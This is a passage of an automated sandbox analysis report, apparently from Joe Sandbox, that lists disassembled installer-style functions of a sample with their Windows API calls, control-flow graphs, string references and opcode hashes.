                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nslEFEC.tmp$C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll$Call
                                                                                                                                                                                                                                • API String ID: 1941528284-145787950
                                                                                                                                                                                                                                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                                                                                                                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 645 4055f6-4055fa lstrcatW 641->645 643 405612-405616 642->643 644 405605-40560c SetWindowTextW 642->644 646 405618-40565a SendMessageW * 3 643->646 647 40565c-40565e 643->647 644->643 645->642 646->647 647->637 648 405660-405663 647->648 648->637
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll
                                                                                                                                                                                                                                • API String ID: 1495540970-2747703244
                                                                                                                                                                                                                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 649 40689a-4068ba GetSystemDirectoryW 650 4068bc 649->650 651 4068be-4068c0 649->651 650->651 652 4068d1-4068d3 651->652 653 4068c2-4068cb 651->653 655 4068d4-406907 wsprintfW LoadLibraryExW 652->655 653->652 654 4068cd-4068cf 653->654 654->655
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 656 40248a-4024bb call 402da6 * 2 call 402e36 663 4024c1-4024cb 656->663 664 402c2a-402c39 656->664 665 4024cd-4024da call 402da6 lstrlenW 663->665 666 4024de-4024e1 663->666 665->666 669 4024e3-4024f4 call 402d84 666->669 670 4024f5-4024f8 666->670 669->670 674 402509-40251d RegSetValueExW 670->674 675 4024fa-402504 call 4032b4 670->675 678 402522-402603 RegCloseKey 674->678 679 40251f 674->679 675->674 678->664 681 40292e-402935 678->681 679->678 681->664
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp
                                                                                                                                                                                                                                • API String ID: 2655323295-3338105827
                                                                                                                                                                                                                                • Opcode ID: c2e77ddd5f06e5ba6494e1e5615a57a5b42731a95510819d931e3bca28b8233c
                                                                                                                                                                                                                                • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2e77ddd5f06e5ba6494e1e5615a57a5b42731a95510819d931e3bca28b8233c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 682 40605c-406068 683 406069-40609d GetTickCount GetTempFileNameW 682->683 684 4060ac-4060ae 683->684 685 40609f-4060a1 683->685 687 4060a6-4060a9 684->687 685->683 686 4060a3 685->686 686->687
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                • API String ID: 1716503409-944333549
                                                                                                                                                                                                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 688 4015c1-4015d5 call 402da6 call 405eb7 693 401631-401634 688->693 694 4015d7-4015ea call 405e39 688->694 696 401663-4022f6 call 401423 693->696 697 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 693->697 702 401604-401607 call 405aeb 694->702 703 4015ec-4015ef 694->703 710 402c2a-402c39 696->710 697->710 717 40165b-40165e 697->717 709 40160c-40160e 702->709 703->702 706 4015f1-4015f8 call 405b08 703->706 706->702 721 4015fa-401602 call 405a6e 706->721 713 401610-401615 709->713 714 401627-40162f 709->714 718 401624 713->718 719 401617-401622 GetFileAttributesW 713->719 714->693 714->694 717->710 718->714 719->714 719->718 721->709
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                • API String ID: 1892508949-670666241
                                                                                                                                                                                                                                • Opcode ID: 6addcb1fcd499a813c44777b30af1a075f267100065c11ad40be965c351e5c4e
                                                                                                                                                                                                                                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6addcb1fcd499a813c44777b30af1a075f267100065c11ad40be965c351e5c4e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 728 4020d8-4020e4 729 4021a3-4021a5 728->729 730 4020ea-402100 call 402da6 * 2 728->730 731 4022f1-4022f6 call 401423 729->731 740 402110-40211f LoadLibraryExW 730->740 741 402102-40210e GetModuleHandleW 730->741 737 402c2a-402c39 731->737 743 402121-402130 call 406979 740->743 744 40219c-40219e 740->744 741->740 741->743 747 402132-402138 743->747 748 40216b-402170 call 40559f 743->748 744->731 749 402151-402161 747->749 750 40213a-402146 call 401423 747->750 753 402175-402178 748->753 755 402166-402169 749->755 750->753 761 402148-40214f 750->761 753->737 756 40217e-402188 call 403b8c 753->756 755->753 756->737 760 40218e-402197 FreeLibrary 756->760 760->737 761->753
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 334405425-0
                                                                                                                                                                                                                                • Opcode ID: 47559a36ebc19421b636ffb62e163a3a93afacd14370c430438519e5d946d215
                                                                                                                                                                                                                                • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47559a36ebc19421b636ffb62e163a3a93afacd14370c430438519e5d946d215
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
